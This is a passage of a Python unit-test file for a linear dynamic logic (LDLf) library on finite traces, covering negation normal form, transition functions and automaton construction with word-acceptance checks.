to_nnf_not_next_ = PathExpressionAlways(to_nnf_trueformula, Or(ff, to_nnf_end))
to_nnf_until_ = PathExpressionEventually(
PathExpressionStar(PathExpressionSequence(PathExpressionTest(tt), to_nnf_trueformula)),
And(tt, to_nnf_not_end)
)
to_nnf_not_until_ = PathExpressionAlways(
PathExpressionStar(PathExpressionSequence(PathExpressionTest(tt), to_nnf_trueformula)),
Or(ff, to_nnf_end)
)
self.assertEqual(self.ldlf.to_nnf(ff), ff)
self.assertEqual(self.ldlf.to_nnf(Or(tt, tt)), Or(tt, tt))
self.assertEqual(self.ldlf.to_nnf(always_), always_)
self.assertEqual(self.ldlf.to_nnf(Not(always_)), not_always_)
self.assertEqual(self.ldlf.to_nnf(PathExpressionEventually(TrueFormula(), tt)),PathExpressionEventually(to_nnf_trueformula, tt))
self.assertEqual(self.ldlf.to_nnf(Not(PathExpressionEventually(TrueFormula(), tt))),PathExpressionAlways(to_nnf_trueformula, ff))
self.assertEqual(self.ldlf.to_nnf(PathExpressionEventually(FalseFormula(), tt)),PathExpressionEventually(to_nnf_false_formula, tt))
self.assertEqual(self.ldlf.to_nnf(Not(PathExpressionEventually(FalseFormula(), tt))),PathExpressionAlways(to_nnf_false_formula, ff))
self.assertEqual(self.ldlf.to_nnf(PathExpressionEventually(TrueFormula(), End())),PathExpressionEventually(to_nnf_trueformula, to_nnf_end))
self.assertEqual(self.ldlf.to_nnf(Not(PathExpressionEventually(TrueFormula(), End()))),PathExpressionAlways(to_nnf_trueformula, to_nnf_not_end))
self.assertEqual(self.ldlf.to_nnf(LDLfLast()), to_nnf_last)
self.assertEqual(self.ldlf.to_nnf(Not(LDLfLast())), to_nnf_not_last)
self.assertEqual(self.ldlf.to_nnf(next_), to_nnf_next_)
self.assertEqual(self.ldlf.to_nnf(Not(next_)), to_nnf_not_next_)
self.assertEqual(self.ldlf.to_nnf(until_), to_nnf_until_)
self.assertEqual(self.ldlf.to_nnf(Not(until_)), to_nnf_not_until_)
# a propositional is not an elementary formula
self.assertEqual(self.ldlf.to_nnf(and_ab), PathExpressionEventually(and_ab, tt))
# a propositional is not an elementary formula, neither in the Test expression
self.assertEqual(self.ldlf.to_nnf(eventually_test_tt), to_nnf_eventually_test_tt)
class TestLDLfEmptyTracesDelta(TestLDLfEmptyTraces):
def test_delta_simple_recursion(self):
ldlf = self.ldlf
tt = LogicalTrue()
ff = LogicalFalse()
and_ab = self.ldlf.to_nnf(And(self.a, self.b))
eventually_a = PathExpressionEventually(self.a, tt)
eventually_b = PathExpressionEventually(self.b, tt)
self.assertEqual(ldlf.delta(tt, frozenset()), TrueFormula())
self.assertEqual(ldlf.delta(ff, frozenset()), FalseFormula())
self.assertEqual(ldlf.delta(self.a, frozenset()), FalseFormula())
self.assertEqual(ldlf.delta(self.a, frozenset({self.a_sym})), tt)
self.assertEqual(ldlf.delta(eventually_a, frozenset({self.a_sym})), LogicalTrue())
class TestLDLfEmptyTracesToNFA(unittest.TestCase):
def setUp(self):
# configutations
self.print_automata = False
self.a_sym = Symbol("a")
self.b_sym = Symbol("b")
self.c_sym = Symbol("c")
alphabet_a = Alphabet({self.a_sym})
self.alphabet_abc = Alphabet({self.a_sym, Symbol("b"), Symbol("c")})
self.ldlf_a = LDLf_EmptyTraces(alphabet_a)
self.ldlf_abc = LDLf_EmptyTraces(self.alphabet_abc)
def test_to_nfa_alphabet_a_logical_true(self):
"""tt"""
a = self.a_sym
tt = LogicalTrue()
x = self.ldlf_a.to_nfa(tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt]), frozenset(), frozenset()), # frozenset([TrueFormula()])),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt]), frozenset({a}), frozenset()) # frozenset([TrueFormula()])),
}
final_states = {frozenset([LogicalTrue()]), frozenset()}
initial_state = {frozenset([LogicalTrue()])}
states = {frozenset([LogicalTrue()]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000000_alphabet_a_logical_true.NFA", "./tests/automata/nfa")
print_dfa(x, "000000_alphabet_a_logical_true.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty ))
self.assertTrue(dfa.word_acceptance([a_] ))
self.assertTrue(dfa.word_acceptance([not_] ))
self.assertTrue(dfa.word_acceptance([a_, not_] ))
self.assertTrue(dfa.word_acceptance([not_, a_] ))
def test_to_nfa_alphabet_a_logical_false(self):
"""ff"""
ff = LogicalFalse()
a = self.a_sym
x = self.ldlf_a.to_nfa(ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([LogicalFalse()])}
states = {frozenset([LogicalFalse()]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000001_alphabet_a_logical_false.NFA", "./tests/automata/nfa")
print_dfa(x, "000001_alphabet_a_logical_false.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_tt(self):
"""tt AND tt"""
tt = LogicalTrue()
tt_and_tt = And(tt, tt)
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_and_tt]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_and_tt]), frozenset({a}), frozenset())
}
final_states = {frozenset(),frozenset([tt_and_tt])}
initial_state = {frozenset([tt_and_tt])}
states = {frozenset([tt_and_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000002_alphabet_a_tt_and_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000002_alphabet_a_tt_and_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_tt_and_tt_and_tt(self):
"""tt AND tt"""
tt = LogicalTrue()
tt_and_tt_and_tt_and_tt = And(tt, And(tt, And(tt, tt)))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_tt_and_tt_and_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_and_tt_and_tt_and_tt]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_and_tt_and_tt_and_tt]), frozenset({a}), frozenset())
}
final_states = {frozenset(),frozenset([tt_and_tt_and_tt_and_tt])}
initial_state = {frozenset([tt_and_tt_and_tt_and_tt])}
states = {frozenset([tt_and_tt_and_tt_and_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000003_alphabet_a_tt_and_tt_and_tt_and_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000003_alphabet_a_tt_and_tt_and_tt_and_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_ff(self):
"""tt AND ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_and_ff = And(tt, ff)
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([tt_and_ff])}
states = {frozenset([tt_and_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000004_alphabet_a_tt_and_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000004_alphabet_a_tt_and_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_tt_and_tt_and_ff(self):
"""tt AND ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_and_tt_and_tt_and_ff = And(tt, And(tt, And(tt, ff)))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_tt_and_tt_and_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([tt_and_tt_and_tt_and_ff])}
states = {frozenset([tt_and_tt_and_tt_and_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000005_alphabet_a_tt_and_tt_and_tt_and_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000005_alphabet_a_tt_and_tt_and_tt_and_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_or_ff(self):
"""tt OR ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_or_ff = Or(tt, ff)
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_or_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_or_ff]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_or_ff]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_or_ff])}
initial_state = {frozenset([tt_or_ff])}
states = {frozenset([tt_or_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000006_alphabet_a_tt_or_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000006_alphabet_a_tt_or_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_or_ff_or_tt_or_ff(self):
"""tt OR ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_or_ff_or_tt_or_ff = Or(tt, Or(ff, Or(tt, ff)))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_or_ff_or_tt_or_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_or_ff_or_tt_or_ff]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_or_ff_or_tt_or_ff]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_or_ff_or_tt_or_ff])}
initial_state = {frozenset([tt_or_ff_or_tt_or_ff])}
states = {frozenset([tt_or_ff_or_tt_or_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000007_alphabet_a_tt_or_ff_or_tt_or_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000007_alphabet_a_tt_or_ff_or_tt_or_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_or_ff_and_tt_or_ff(self):
"""tt OR ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_or_ff_and_tt_or_ff = And(Or(tt, ff), Or(tt, ff))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_or_ff_and_tt_or_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_or_ff_and_tt_or_ff]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_or_ff_and_tt_or_ff]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_or_ff_and_tt_or_ff])}
initial_state = {frozenset([tt_or_ff_and_tt_or_ff])}
states = {frozenset([tt_or_ff_and_tt_or_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000008_alphabet_a_tt_or_ff_and_tt_or_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000008_alphabet_a_tt_or_ff_and_tt_or_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_eventually_a_ff(self):
"""<a>ff"""
a = self.a_sym
ff = LogicalFalse()
eventually_a_ff = PathExpressionEventually(AtomicFormula(a), ff)
x = self.ldlf_a.to_nfa(eventually_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([eventually_a_ff]), frozenset({a}), frozenset({ff})),
}
final_states = {frozenset()}
initial_state = {frozenset([eventually_a_ff])}
states = {frozenset([eventually_a_ff]), frozenset([ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000009_alphabet_a_eventually_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000009_alphabet_a_eventually_a_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_false(self):
"""false"""
a = self.a_sym
tt = LogicalTrue()
eventually_false_tt = PathExpressionEventually(FalseFormula(), tt)
pl = PL(self.ldlf_a.alphabet)
expanded_false = pl.expand_formula(FalseFormula())
expanded_eventually_false_tt = PathExpressionEventually(expanded_false, tt)
x = self.ldlf_a.to_nfa(eventually_false_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([expanded_eventually_false_tt])}
states = {frozenset([expanded_eventually_false_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000010_alphabet_a_eventually_false_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000010_alphabet_a_eventually_false_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_true(self):
"""false"""
a = self.a_sym
tt = LogicalTrue()
eventually_true_tt = PathExpressionEventually(TrueFormula(), tt)
x = self.ldlf_a.to_nfa(eventually_true_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_true_tt}), frozenset(), frozenset({tt})),
(frozenset({eventually_true_tt}), frozenset({a}), frozenset({tt})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_true_tt])}
states = {frozenset(), frozenset([eventually_true_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000011_alphabet_a_eventually_true_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000011_alphabet_a_eventually_true_tt.DFA", "./tests/automata/dfa")
# nfa = _to_pythomata_nfa(x)
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_not_a(self):
"""false"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_not_a_tt = PathExpressionEventually(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(eventually_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_not_a_tt])}
states = {frozenset(), frozenset([eventually_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000012_alphabet_a_eventually_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000012_alphabet_a_eventually_not_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_a(self):
"""false"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_a_tt = PathExpressionEventually(atomic_a, tt)
x = self.ldlf_a.to_nfa(eventually_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_a_tt}), frozenset({a}), frozenset({tt})),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_a_tt])}
states = {frozenset(), frozenset([eventually_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000013_alphabet_a_eventually_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000013_alphabet_a_eventually_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_a_equivalence(self):
"""a === <a>tt"""
a = self.a_sym
tt = LogicalTrue()
atomic_a = AtomicFormula(a)
eventually_a_tt = PathExpressionEventually(atomic_a, tt)
self.assertEqual(self.ldlf_a.to_nfa(atomic_a), self.ldlf_a.to_nfa(eventually_a_tt))
def test_to_nfa_alphabet_a_eventually_test_a_tt(self):
"""<a>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_test_a_tt = PathExpressionEventually(PathExpressionTest(atomic_a), tt)
expanded_eventually_test_a_tt = PathExpressionEventually(PathExpressionTest(PathExpressionEventually(atomic_a, tt)), tt)
x = self.ldlf_a.to_nfa(eventually_test_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({expanded_eventually_test_a_tt}), frozenset({a}), frozenset({tt})),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([expanded_eventually_test_a_tt])}
states = {frozenset(), frozenset([expanded_eventually_test_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000014_alphabet_a_eventually_test_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000014_alphabet_a_eventually_test_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_eventually_sequence_a_not_a_tt(self):
"""<a;a>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_sequence_a_not_a_tt = PathExpressionEventually(PathExpressionSequence(atomic_a, Not(atomic_a)), tt)
eventually_not_a_tt = PathExpressionEventually(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(eventually_sequence_a_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({eventually_sequence_a_not_a_tt}), frozenset({a}), frozenset({eventually_not_a_tt})),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_sequence_a_not_a_tt])}
states = {frozenset(), frozenset([eventually_sequence_a_not_a_tt]), frozenset([eventually_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000015_alphabet_a_eventually_sequence_a_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000015_alphabet_a_eventually_sequence_a_not_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_a_tt(self):
"""<a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_star_a_tt = PathExpressionEventually(PathExpressionStar(atomic_a), tt)
x = self.ldlf_a.to_nfa(eventually_star_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_a_tt}), frozenset(), frozenset()),
(frozenset({eventually_star_a_tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([eventually_star_a_tt])}
initial_state = {frozenset([eventually_star_a_tt])}
states = {frozenset(), frozenset([eventually_star_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000016_alphabet_a_eventually_star_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000016_alphabet_a_eventually_star_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_a_ff(self):
"""<a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
eventually_star_a_ff = PathExpressionEventually(PathExpressionStar(atomic_a), ff)
x = self.ldlf_a.to_nfa(eventually_star_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_a_ff}), frozenset({a}), frozenset({eventually_star_a_ff})),
}
final_states = {frozenset()}
initial_state = {frozenset([eventually_star_a_ff])}
states = {frozenset(), frozenset([eventually_star_a_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000017_alphabet_a_eventually_star_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000017_alphabet_a_eventually_star_a_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
